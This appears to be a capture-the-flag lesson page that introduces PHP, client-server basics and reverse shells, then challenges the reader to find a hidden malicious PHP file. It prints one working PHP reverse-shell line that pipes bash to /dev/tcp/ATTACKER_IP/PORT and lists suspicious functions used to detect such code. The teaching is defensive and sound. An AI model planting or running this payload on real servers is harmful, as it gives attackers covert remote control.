← Back to Lessons

In the Shadow of Code - Hunting the Reverse Shell

PHP: The Server-Side Language
What is a Reverse Shell?

In cybersecurity, not everything is visible or tangible at first glance; sometimes, danger lurks in seemingly innocent lines of code, waiting for the right moment to open a backdoor. Today, you'll learn to be a hunter in that shadow.

This challenge invites you to discover a malicious payload hidden within a basic PHP website. Your mission is to find the absolute path of this hidden threat.

PHP: The Server-Side Language

PHP (Hypertext Preprocessor) is one of the most widely used programming languages on the web. It's an interpreted language that runs on the server side and generates dynamic web pages. Whenever you visit a site with dynamic content, there's a good chance PHP is behind it.

What is PHP used for?

  • Creating web pages that interact with databases
  • Generating dynamic content based on user or context
  • Handling forms and sessions
  • Building APIs and web services

Client-Server Architecture

On the web, everything is a role-playing game:

  • Client: the browser requesting information (you)
  • Server: the machine that processes the request, runs PHP, and sends the response

The server executes the PHP code and returns the result in HTML for the client to display. Communication happens via protocols like HTTP or HTTPS.

What is a Reverse Shell?

A reverse shell is a technique used by attackers to gain remote control over a compromised server or machine.

Instead of the attacker connecting directly to the server (which may be blocked by firewalls), the server connects to the attacker, opening a communication channel where the attacker can execute commands as if they were on the local terminal.

What is a reverse shell used for?

  • Maintaining covert remote access
  • Evading firewalls or network restrictions
  • Controlling compromised systems to steal information, modify files, or move laterally

What does a PHP reverse shell payload look like?

A PHP reverse shell payload is essentially code that executes operating system commands and opens network connections to an attacker.

A basic example (no spoilers) might be:

1<?php
2exec("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'");
3?>

This code runs an interactive shell that connects to the attacker at the specified IP and port.

How to identify a malicious payload?

  • PHP files containing suspicious functions: exec(), shell_exec(), system(), passthru(), popen(), proc_open()
  • Obfuscated or injected code (excessive use of base64_decode(), eval())
  • Undocumented or out-of-place files or paths in the site structure
  • Presence of unusual outbound network connections

Your goal is not just to understand what PHP is or what a reverse shell is. Your challenge is to analyze the code, detect where the payload might be, and determine the absolute path of the malicious file.

This is the day to sharpen your analytical eye and your patience, so that the silence of the code lines reveals what an attacker tried to hide.